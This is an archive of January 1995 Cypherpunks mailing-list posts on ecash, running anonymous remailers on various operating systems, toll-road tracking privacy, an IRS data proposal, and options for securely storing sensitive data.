>person would indicate the other people who's iou's they will accept
>(and the amount they would be willing to take).  Thus I might take (up
>to $10 of) Jo's, who might take Carol's who might take Terry's, etc.
>
>  To buy something from me online, you will need to produce an IOU
>from Jo, Carol or Terry.  I would hand it to Jo for verification.  Jo
>would accept it or reject it (perhaps after talking to some other
>folks online).  If it were a CarolIOU, or a TerryIOU I would insist Jo
>trade it for a JoIOU.  All the details could be hidden behind a nice
>little GUI.

Certainly, that's what money is after all. Pretty much.  But how are you
going to transfer these IOUs electronically in a way that is relatively
fraud-proof?  Digital money.  Ecash.  When we say "ecash", we're talking
about what Chaum was writing about in whatever paper, what Schneier
describes protocols for in AC.
Maybe the ecash is redeemable in US dollars, or maybe it's redeemable for
10 units of service from Jon Smith, but an ecash protocol is what you are
going to use to transfer and issue those digital certificates of value,
whatever the value represents.

And of course, if you want to use these certificates of value anonymously,
which is what is required to pay for an anon remailer, there are some
slightly more stringent requirements. The right kind of ecash protocol can
still handle it.  But Carol probably shouldn't be paying for a remailer in
CarolBucks (or CarolIOUs, whatever), at least not unless Carol is such a
big spender that CarolBucks are in wide circulation and used by lots of
people other then Carol.  Which I guess is possible in your system.

A pseudo-anarchist non-state-supported debt system would work fine, but you
still need a mechanism to transfer your certificates of value, whether they
stand for ten U.S. dollars, or 10 hours that Jon Smith will work mowing
your lawn.  And another way to look at it is that you are just proposing an
ecash system where every person issues their own ecash, instead of just a
few central banks doing it.  There are advantages and disadvantages to that
sort of thing, and it might be something interesting to think about, but
you ultimately aren't going to be able to do it over a computer network
without ecash.  Ecash is the way you represent value certificates in
digital form, pretty much.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 20 Jan 95 16:57:45 PST
To: cypherpunks@toad.com
Subject: Purshottam
Message-ID: <199501210057.TAA29696@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
>----- Forwarded message (Andrew Purshottam <andy@eon.netcom.com>) -----< 
 
 
Dear Mr. Purshottam, 
 
Mail to <andy@eon.netcom.com> boings. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 20 Jan 95 23:44:39 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501210301.TAA09022@netcom14.netcom.com>
Message-ID: <199501210401.AA02848@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> I don't think "disingenuous" as very apt description. For one thing,
> my proposal certainly doesn't make things any _worse_ for the true
> remailers. 

Sorry if I was unclear; I didn't mean that you were being disingenuous,
just that the assignment of responsibility/culpability in at least 
some of the schemes being discussed looks suspect to me.

I do think that this plan can create greater risk for the owners of
machines which operate remailers - what if one of their customers 
decides not to block traffic to whitehouse.gov, or to
alt.religion.copyright, or whatever? Neither the SPA nor the Secret
Service has acted particularly cluefully with respect to seizing
hardware or conducting unnanounced destructive "fishing" expeditions.
As things stand today, I have some control (via my filter list) of
the risks I'm willing to assume and not assume. If I let people with
no real stake in the matter gamble with my machine based on their own
choices about filtering, that looks like a loss to me.

(Of course, the machine owner can always, via contract, set certain
terms - e.g., addresses which must be filtered. This starts to look
like active participation in the administration of the remailer, which
makes the off-site operator structure seem less legitimate.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyCGan3YhjZY3fMNAQFpbwQAj/PSC5e2IxCpuxaLMXi/vX2DsJp6q8x0
LzKrI57AjujC07o7vHGHlhPZIgWC7hTgNxAy3wRNOqRDwb7FdX6GQfMM4aWmbU4U
1pypD5eipO3CgkaHm5VqpKnVdDmxFQ3r6tDY1qV8jV0ghnku9DpmHhQIr4C+U1Cx
krBo2FThMRo=
=qguX
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 21:18:50 PST
To: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Subject: Re: The Remailer Crisis
In-Reply-To: <v01510100ab4639b0ffe3@[152.97.12.101]>
Message-ID: <199501210517.VAA16355@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Rhys Kyraden wrote:

> Okay. Here's my 2-bits.
> I run on the MacOS, but how hard could it be to port this code? If anyone
> is willing to do this (I assume it's not written in Pascal, which is my
> only language of any consequence), I will run it. It will be available from
> now until I graduate in '98 during the school months. If anyone wants to
> try this from scratch, we could try it in Pascal. I would be very willing
> to do the developing as well as host a discussion list for anyone who jumps
> in.

But is your Mac on the Internet on a more or less continuous basis? A
remailer that only works when the owner happens to log on to collect
his mail is not terribly useful (though not useless, as others have
also noted....just a "very unpredictable lag time" remailer, sort of
the "surface mail" of e-amil).

It happens that the Net is mainly built up of Unix boxes, hence the
focus here on Unix. OS/2, Windows, and Mac boxes will be used
increasinly for constant connection applications, so the idea has
merit, long term.

(Another nit: the Mac, which is what I also use, currently lacks
preemptive multitasking. Thus, if one's Mac is playing a multimedia
CD-ROM when new mail comes in, it likely won't get remailed until the
first app quits or is manually switched out. (Yeah, a few things like
print drivers can run in background, and maybe the new TIA emulators
can trick the OS into processing SLIP or PPP mail in the background,
but who knows?) The consensus is that the Mac is powerful, but it
ain't cut out yet to be a Unix box.)

The language is a lesser deal. Remember that Eric Hughes knocked out
the first remailer in Perl in a few days, and MacPerl exists for the
Mac. Going to Pascal would probably be more trouble than it's worth.

But the most important feature to have is a solid, reliable connection
to the Net. A computer that gets taken to classes, is not connected to
the Net, etc., is not very useful as a remailer.

(The key is not that a remailer can sometimes remail, but that it can
be counted on to be part of chain without the mail getting "dropped on
the floor.")

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 21:38:37 PST
To: dan@chopin.udel.edu (The Dalai Lama)
Subject: Re: The Remailer Crisis
In-Reply-To: <Pine.SOL.3.91.950120221331.8346B-100000@chopin.udel.edu>
Message-ID: <199501210537.VAA19112@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The Dalai Lama wrote:

(By the way, Hello, Dalai!)

> So why not just implement remailers for the DOS/OS/2/Windows NT crowd?  
> I think we'd see more remailers if people didn't need to leave their OS 
> of choice just to run UNIX and a remailer.  OS/2 and Windows NT are 
> stable platforms.  If there was little performance impact caused by an 
> OS/2 remailer process, I'd be more than willing to let it run.
> 	Is anyone working on porting remailer code to one of the 
> IBM/Microsoft operating systems?  Perhaps I'll get cracking on an OS/2 
> version....

I addressed this main issue in the posting about writing remailers for
Macs, so I'll be ultra-brief here.

Had DOS/Windows/OS/2 boxes been "on the Net" in a serious way when
Eric wrote the first remailer in 1992, he could have written the
remailer for the DOS box he then owned.

The issue has been that Unix boxes have dominated the Net, with lots
of tools for handling mail, redirecting output, etc. DOS tends to have
standalone apps, with cumbersome communication, and DOS has not had
preemptime multitasking as Unix of course has had.

"The network is the computer," as Scott McNeally used to say, and a
reliable and continuous Net connection is much more important for a
remailer than a fast CPU or GUI environment.

This will change, based on the numbers of Windows and OS/2 systems
being sold, and based on moves to build-in Net connection
capabilities.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: northrop@netcom.com (Scott Northrop)
Date: Fri, 20 Jan 95 21:39:08 PST
To: cypherpunks@toad.com
Subject: "Smart Roads" for toll collection and traffic logging
Message-ID: <199501210538.VAA13452@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Here in Seattle there is a proposal to turn a couple of traffic chokepoints
into toll roads.  Because a toll plaza would back things up even worse, I'm
guessing they'll look to an automated system that will let you pay without
leaving your car.  This is established tech -- a nifty article about it showed
up in _Electronic Design_ last month.

The downside is that it'll not be designed with privacy in mind at all, and
will eventually have this pesky database of who went by the toll booth and
when.  We all know that old databases never die, they just get put on tape and
stuffed in a box, to wait for someone with a curious streak to come by.  This
is a well-established problem with naiive designs of automated toll plazas,
and I am looking for examples of things that could be done with this database
by someone with ill intent, or could be done with the toll system itself if it
got to be more widespread.

- Obviously, if your car is talking to the road all the time, speeding tickets
are a gimme.

- You might be targeted for "further investigation" if you happen to drive by
the wrong part of town.  Gotta step up the heat on that war on drugs, ya know.

I can come up with all sorts of ways to detect people from committing crimes
(and don't really need those examples -- folks might think I *want* a Big
Brother Highway!), but I'm curious what peoples' fears are about what this
could mean to innocent folks, Joe Sixpack and his pals.  There is a meeting in
a few days where public comment on the toll road idea is being solicited, and
I want to have some really compelling horror stories with which to capture
peoples' imaginations about what a Big Brother Highway could mean.

I want to scare people, but I want to scare 'em with something believable.

If there's an archive that mentions anything like this, please point it out in
private mail.  I'll summarize what I get to the list, and also make that
document available on the web, if anything interesting comes up.

Thanks!

Scott


-- 
Scott Northrop  (206)559-9878   northrop@netcom.com, northrop@mccaw.com
      Those who use arms well cultivate the Way and keep the rules.
      Thus they can govern in such a way as to prevail over the corrupt.
                                     -- Sun Tzu, The Art of War, Book IV



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 20 Jan 95 18:59:12 PST
To: "Paul J. Ste. Marie" <pstemari@erinet.com>
Subject: Re: IRS to keep unreviewable secret dossiers on US citizens
In-Reply-To: <9501202311.AB09922@eri.erinet.com>
Message-ID: <9501210257.AA29480@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Fri, 20 Jan 95 18:11:54 EST
    From: "Paul J. Ste. Marie" <pstemari@erinet.com>
    
    At 12:44 PM 1/20/95 CST, xpat@vm1.spcs.umn.edu wrote:
    >Excerpts from : St Paul Pioneer Press, Jan 29, 1995
    >

    . . .

    Comments on the proposed system must be received by January 19, 1995,

Ok, let me get this straight.  In nine days there will be an article
which will mention that yesterday was the last day to comment on this.
Cool!  :-)

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpp@markv.com
Date: Fri, 20 Jan 95 22:09:15 PST
To: cypherpunks@toad.com
Subject: cpla mailing list revived
Message-ID: <9501202206.aa14003@hermix.markv.com>
MIME-Version: 1.0
Content-Type: text/plain


The quietness of the cpla list was brought to my attention recently.
I have improved the list software, changed the list address into a
real internet style mailing list.  You should now be able to be join
and depart the cpla mailing list automatically.  Who knows, this might
even prompt a physical get-together.

I will be adding the members of the old list to the new list, so
expect to get another copy of the welcome message if you were on the
cpla list a while ago.

Here is a copy of the welcome message, FYI.

Welcome to the Cypherpunks LA <cpla@markv.com> mailing list.

Like every moderator of every new list, I hope this will be mostly
signal and very little noise.  I don't envision this as a general
discussion list -- that's what the main list is for.

This list is for:

	Coordinating physical meetings of Cypherpunks in the Los
	Angeles area: Location, time, equipment, arranging rides,
	etc.

	Suggesting topics to cover at the meetings.

	Coordinating other local group activities.

	Announcements of relevant talks, seminars and other such
	goodies in the Los Angeles area and environs.

	*Concise* pointers to other local groups, mailing lists, and
	sources of information that might be of interest to local
	Cypherpunks.

	Whatever everyone seems to use it for.

This list is NOT for:

	Reposting the "important" messages from the main list or any
	other mailing list or newsgroup.  (If someone wants to run a
	"distilled" Cypherpunks list, fine.  This isn't it!)

	Preaching to the converted.  No ranting!  (If you want to
	rant, do it on the main list.  Everyone else seems to...)

	Rehashing the same topics that are going on the main list.

This list is now managed by a simple minded program.  Send a message
with a blank body and the subject 'subscribe' to be added to the
list.  The subject 'unsubscribe' will remove you from the list.

Any suggestions for how to improve this intro are welcome.  Any
suggestions for a *local* FAQ are also welcome.  Direct your
sugestions to me at jpp@markv.com.  PGP/ViaCrypt mail gladly
accepted.

This information is also available at
ftp://ftp.markv.com/pub/jpp/cp-la-hi.txt

j' <jpp@markv.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 22:12:38 PST
To: northrop@netcom.com (Scott Northrop)
Subject: Re: "Smart Roads" for toll collection and traffic logging
In-Reply-To: <199501210538.VAA13452@netcom5.netcom.com>
Message-ID: <199501210610.WAA24523@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Northrop wrote:

> Here in Seattle there is a proposal to turn a couple of traffic chokepoints
> into toll roads.  Because a toll plaza would back things up even worse, I'm
...
> The downside is that it'll not be designed with privacy in mind at all, and
> will eventually have this pesky database of who went by the toll booth and
> when.  We all know that old databases never die, they just get put on tape and
> stuffed in a box, to wait for someone with a curious streak to come by.  This

No doubt the various cites and local governments can raise extra
revenue by selling the tracking data to the IRS for their new
"Compliance 2000" program, to FinCEN to see if suspicious travel
patterns are being engaged in, to the War on Some Drugs soldiers to
see if the car is deemed to be a drug carrier, and so on. Even better,
women seeking abortions, for example, could be denied access to the
toll roads that are known to lead to the evil abortionists! The
possibilities are endless.

All of this is old news, in that Brunner warned of ubiquitous
computers in "The Shockwave Rider," and Chaum explicity dealt with the
threat of position tracking in his proposal for digital, untraceable
cash.

Lucky Greene demonstrated at the last CP meeting a toll payment card
that uses Digicash.  About the size of a credit card, it handles the
payment but is unlinkable to driver or car ID.

Cities won't use this technology unless customers demand it. Of
course, cities don't view road users as customers who can take their
business elsewhere.

I don't expect very widespread use of digicash.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Fri, 20 Jan 95 20:14:25 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <v01510100ab4639b0ffe3@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Okay. Here's my 2-bits.
I run on the MacOS, but how hard could it be to port this code? If anyone
is willing to do this (I assume it's not written in Pascal, which is my
only language of any consequence), I will run it. It will be available from
now until I graduate in '98 during the school months. If anyone wants to
try this from scratch, we could try it in Pascal. I would be very willing
to do the developing as well as host a discussion list for anyone who jumps
in.
I will take no responce to mean that all options are not going to be
pursued, and that this discussion is just that, a discussion.

- -Kyraden
-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLyCKEEiLvmPjc4XdAQEGtAP/TqjIlPgmVWto4Gklrhj8F1LCyyb0urfD
QGkGlFODmAuv8jyLHzXUHI8xjaNQHD/fSI7xtsuOODPfDMxuoPGJ6Myfx7OjZ7Ff
nVagNeV6N3f1pVW8BLRaoP5gibnZZWq/c2tTuDbXF1wm3h594iP6leugT3Q+3112
NtBTMH6YPVE=
=GX7K
-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's January 29th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 20 Jan 95 19:19:28 PST
To: Greg Broiles <greg@ideath.goldenbear.com>
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501210129.AA01692@ideath.goldenbear.com>
Message-ID: <9501210318.AA05326@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: Greg Broiles <greg@ideath.goldenbear.com>
    Date: Fri, 20 Jan 1995 17:28:58 -0800 (PST)
    
    Tim May wrote:
    
    > I am waiting for such services to be actually, formally, solidly
    > announced, not just casual remarks that it might be possible. And of
    > course the software should be "ready to wear," port-a-potty, so that
    > the remailer account owner does nothing more than pay for the account.
    
    In this model, who deals with mailbombs/spams/requests for address blocks?

With sameer's recently announced RIAB, it seems quite reasonable that
Tim could follow the instructions that were sent out and when he gets
to this one:

 3) If you wish, you can setup a .forward file to point to mailfilters
 or to another account. 

then he could do this:

 % echo 'tcmay@netcom.com' > ~/.forward

and then he would never have to log into c2 again.

This is not quite at the level of what Tim explicitly stated:
``remailer account owner does nothing more than pay for the
account.'', but it's about as close as one could hope for while
addressing your concerns.

Of course, Tim could adopt `hands off' administation by doing any of
the following:
 - forwarding to /dev/null
 - using auto-bounce script
 - forwarding to tcmay@netcom.com, but ignoring all mail related to
   his remailer.

It might be a good idea to check that sameer thinks this is ok.  It's
bound to piss people off more than remailers with a more interactive
administrator.  It basically says that mail bombs and spams are
acceptable and requests are pointless.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Dalai Lama <dan@chopin.udel.edu>
Date: Fri, 20 Jan 95 19:20:06 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <9501201626.AA03495@firefly.prairienet.org>
Message-ID: <Pine.SOL.3.91.950120221331.8346B-100000@chopin.udel.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Jan 1995, Jeff Licquia wrote:

> I envision a setup right now where you could (if you wanted) type "remailer"
> at the DOS prompt to bring the remailer up.  The screen would show a
> monitor-type program, with a menu option to "R)eboot" to DOS again (or you
> could just hit Ctrl-Alt-Del).
> 
So why not just implement remailers for the DOS/OS/2/Windows NT crowd?  
I think we'd see more remailers if people didn't need to leave their OS 
of choice just to run UNIX and a remailer.  OS/2 and Windows NT are 
stable platforms.  If there was little performance impact caused by an 
OS/2 remailer process, I'd be more than willing to let it run.
	Is anyone working on porting remailer code to one of the 
IBM/Microsoft operating systems?  Perhaps I'll get cracking on an OS/2 
version....
					Dan

--
[Here's something for those friendly mail scanners...]
hack phreak crack assassinate president virus espionage clinton honduras
root RSA LSD-25 plutonium north korea terrorist encryption die NSA CERT quiche





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 22:38:45 PST
To: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Subject: Re: The Remailer Crisis
In-Reply-To: <v01510103ab46516c92d0@[152.97.12.101]>
Message-ID: <199501210637.WAA28437@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Rhys Kyraden wrote:

> Yes, my machine has a 56k direct line in, 24 hrs. a day, 7 days a week
> (during school months!;-)) The server you just mailed to is on this
> machine.

If it's up nearly all the time (23.8 hours a day), accepting mail,
then I see no reason your machine can't be a remailer. If, however, it
gets turned off, taken home for the holidays, isn't always in a state
to accept mail, then your remailer will get pinged and downchecked by
the testing programs. 

(And you won't easily be able to arrange for multple "accounts" on the
machine, given the sorry state of such things on the Mac.)

> I agree that the Mac lacks some of the more powerful Unix features, namely
> preemtive multitasking, but I also believe that, at least with the newer
> Macs, CPU time-sharing is more efficient than it used to be. Know of Chuck
> Shotton's MacHTTP WWW server for the Mac? An excelent piece of software
...

Others may know more about this means for running a remailer on a Mac.
I do know that Scott Collins, a Mac programming wizard who works for
Apple, chose to run his remailer on Netcom's Unix machines...he would
be a person to ask about what you hope to do.

> I thought that it was in Perl. I have tried pulling Unix Perl scripts and
> running them under MacPerl, but it doesn't quite do it. In fact, it usually
> doesn't do anything but spew errors back at you.

I can't help here. Try the Perl discusssion groups...there's probably
a FAQ on both Perl and MacPerl that discusses incompatibilities and issues.

As an aside, maybe working on another project, one that is actually
new territory, would be a more interesting and useful thing to do.
With a 660AV, and the various audio tools available, a Mac version of
PGP Phone might be a lot more interesting.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Fri, 20 Jan 95 19:57:18 PST
To: cypherpunks@toad.com
Subject: Hakim Bey URL, etc.
Message-ID: <v01510100ab462c6b6caf@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


The URL for the Hakim Bey web site (someone might have already posted this) is:
http://www.uio.no:80/~mwatz/bey/


Except from the Hakim Bey interview in "Axcess" magazine (conducted last
summer):

"I have to admit I felt a certain intense interest, perhaps even amounting
to a potential enthusiasm, when this tech was first being discussed," Bey
told me.  I'd read William Gibson like the rest of us, and I certainly
understood his dystopian point, but nevertheless, when Tim Leary and people
like that began to get enthusiastic, I had to investigate on that level.  I
haven't seen much evidence that what Uncle Tim thought was going to happen
is really happening.  Once again, any technology could be democratic if it
were distributed, you know what I mean?  It's a simple Marxist thing about
means of production.  There's nothing inherently authoritarian--at least at
first glance--to any technology, although one could argue about how
technology then shapes the society that has already shaped the technology
in a kind of feedback loop that can move towards greater and greater
authoritarianism or lack of autonomy.  The potential for what, back in the
50's and 60's, people were calling electronic democracy, is obviously still
there as a potential structure.  You can see certain elements of it in the
Net, but when you're talking about the high tech involved in virtual
reality you're really talking about something that is not accesible to most
people.  And I think it probably never will be.  There's never going to be
any cheap VR kit that's going to allow a dock worker in Manila to get on
some kind of cyberspace Internet, much less a dock worker in Atlanta--or
me, for example."

Bey was equally gloomy about the future of the Internet.  "My impression is
that 90 per cent of what goes out over it is completely unrelated to any
kind of freedom interests, autonomy proposals or projects, or struggles for
genuine non-hierarchical, non-authoritarian group dynamic.  Most of it is
just chit-chat--banal chit-chat that could just as easily be carried out
over an old-fashioned party line phone."

Unabashed in my online addiction, I couldn't help but ask if he saw _any_
way to realize the internet as a T.A.Z.

"I'm led to believe, through conversations with people who are much more
techie and active than I am, that cypher--unbreakable code--is the key.  So
the cypherpunks are the people to keep an eye on at this moment.  They tend
to be the ones who are most active around freedom of speech
issues...whether legal or extra-legal.  Even so, Bey felt that the powers
that be will never allow the "Information Superhighway" to develop
unchecked.

"I think Clipper was a declaration of war on the Net.  The fact that the
egg is on their face, because within ten minutes some hacker figured out
how to beat the Clipper, is an indication of--oh, let's call it an area of
chaos.  Within areas of chaos, either horrible destruction and disease and
death occur.  Or, if you're flowing the right way, and if all hearts are
beating in unison to a certain degree, then that area of chaos can become
the T.A.Z.  Now I've said over and over again that there's no such thing as
a T.A.Z. that's only on the Net, and I maintain that that's true.  In order
to have autonomy, you have to have physicality.  Autonomy is not something
that can only exist in the imagination or in the world of images.  I think
that it involves the entirety, the whole axial being, and that is rooted in
the earth and concerns physicality, materiality, the body--mortality, if
you like--as contrasted to the spurious immortality of cyberspace.  But I
still maintain that, at least in theory, the Net could be an adjunct to the
T.A.Z., could be a tool or a weapon, even, if you want to look at it that
way, for the construction of the T.A.Z."

--
Dave Mandl
dmandl@panix.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 23:14:40 PST
To: cypherpunks@toad.com
Subject: Data Vaults (vs. Data Havens)
In-Reply-To: <2778lyczB0I7075yn@netcom.com>
Message-ID: <199501210713.XAA17754@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Bostick wrote:

> Pat Cadigan, in her novel SYNNERS, had the off-beat idea of having
> crucial data encoded into graphical images and tattooed onto the skins
> of beach bums.  
> 
> I've heard of worse ideas. . . .

She's a better novelist than an information theorist...

All the talk recently about data havens [secure storage variety] got
me to thinking. 

(In case you're wondering, I specified [secure storage variety]
becuase there seems to be some confusion, or at lest conflation, about
what a "data haven" does. Is it for selling illegal data publically?
Is it for storing sensitive material, privately? Something else?)

Anyway, for securely storing data that one wishes to be able to later
retrieve, but wishes thieves and authorities not to have, here are
some major possibilities:

1. The old stand-by. Keep copies of data at a friend's house. (This is
what I do, to guard against fires or thefts or ransackings by the
Thought Police.)

(Knowing where the stuff is stored is part of the "key" to getting it,
and only adds a few bits to the overall key lenth in most cases. That
is, not much security against a capable adversary, But fires are
usually pretty dumb, and cops not much smarter, so this works pretty
well.)

2. True secure storage, using a commercial service. Mineshafts, salt
domes, concrete buildings, etc. are commonly used for this. Corporate
records, etc. Pay a fee, store your files, etc. Of course, a subpoena
will get the data posthaste.

2A. Offshore secure storage, in a jurisdiction that will no honor
subpoenas form one's country. Lots of obvious issues here: bribery of
the vault, pressures applied locally, black bag jobs, etc.

3. Encryption, with either local or remote storage. 

3A. Encrypted, but local. This is by far the most common scenario, the
one most of us use all the time. Can the authorities force disclosure
of a key? I have a *lot* on this in my FAQ, so I won't repeat it here.
Basic conclusion: has not been tested, but it is unlikey that a
defendent who claims to have "forgotten" his passphrase, or who just
clams up, will get zapped for this, per se.

3B. Encrypted, offshore. Actually, this is similar to the above. If
the court can compell decryption, it can certainly compell retrieval
of files. And if it can't compell decryption, the files are no less
safe if stored locally.

(But I admit that the realities are not so simple. Offshore storage
offers some additionaal advantages. For one, "duress codes" that the
site owner in Belize that the person requesting the material, in LA,
is actually under duress. The site operator can then report back a
convenient "disk crash" and the authorities will be screwed. This
stratagem is harder to do cleanly in the U.S., for example, where the
site owner might be subpoenaed.)

4. Purloined Letter. Hide it in plain site. Steganography, in one of
your hundreds of DATs, or in GIFs and PICTs, etc. Without the key,
they won't know where it is.

(I've been pushing this since 1988, in postings on sci.crypt and
elsewhere. Romana Machado and others have implemented the image-based
version.) 

5. A variant is to use ftp sites. Encrypt the data and place it in an
ftp site that allows write access. Use remailers if you wish. Then,
your secret data is stored in encrypted, unidentifiable form on
someone else's computer, retrievable by you later.

(Lots of issues here. Our never-realized "anonymous anonyomous ftp"
capability could mean the storer would not even know what continent
the site was on.)

Well, these are just some of the ideas. Me, I stick to simply
encrypting sensitive files and keeping a couple of copies in safe
places. 

I don't think we ought to call these uses "data havens." Save the term
"data haven" for those places, in cyberspace or in real space, that
sell access to Nazi medical experiments, that sell illegal birth
control information, that buy weapons secrets, and so on. 

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Master-X <hodges@roadrunner.com>
Date: Fri, 20 Jan 95 22:13:13 PST
To: cypherpunks@toad.com
Subject: Send Me The Stuff
Message-ID: <199501202316.XAA22586@beep.roadrunner.com>
MIME-Version: 1.0
Content-Type: text/plain


Please e-mail me with the stuff.
      





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Banisar <tc@phantom.com>
Date: Fri, 20 Jan 95 20:26:07 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: IRS to keep unreviewable secret dossiers on US citizens
In-Reply-To: <9501201845.AA09218@toad.com>
Message-ID: <Pine.3.89.9501202321.A4231-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain



A copy of the IRS notice and EPIC's reponse are  available at cpsr.org 
/cpsr/privacy/epic/. The article below ran on the Knight Ridder newswire 
and appeared in at least 20 newspapers. We got a call late tonight from 
the IRS saying there were yanking the proposal.

Dave



On Fri, 20 Jan 1995 xpat@vm1.spcs.umn.edu wrote:

> Excerpts from : St Paul Pioneer Press, Jan 29, 1995
> 
> "IRS plans to collect more data on individuals to nab tax cheats"
> 
> a "vast expansion of secret computer database of information it
> keeps on virtually all Americans" will include "credit reports,
> news stories, tips from informants,  and real estate, motor vehicle
> and child support records, plus conventional Govt financial data"
> 
> "Any individual who has business and/or financial activities can
> expect upgraded agency reports to be put to IRS auditors promptly"
> 
> Here's the kicker: "Although agency officials concede that some of
> the data collected will be inaccurate, taxpayers will not be allowed
> to review or correct it"                         ^^^^^^^^^^^^^^^^^^^
> ^^^^^^^^^^^^^^^^^^^^^^^
> So much for the FOIA.
> 
> ------------------------------------------------------------------------
> P M Dierking |
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Fri, 20 Jan 95 21:51:21 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <v01510103ab46516c92d0@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


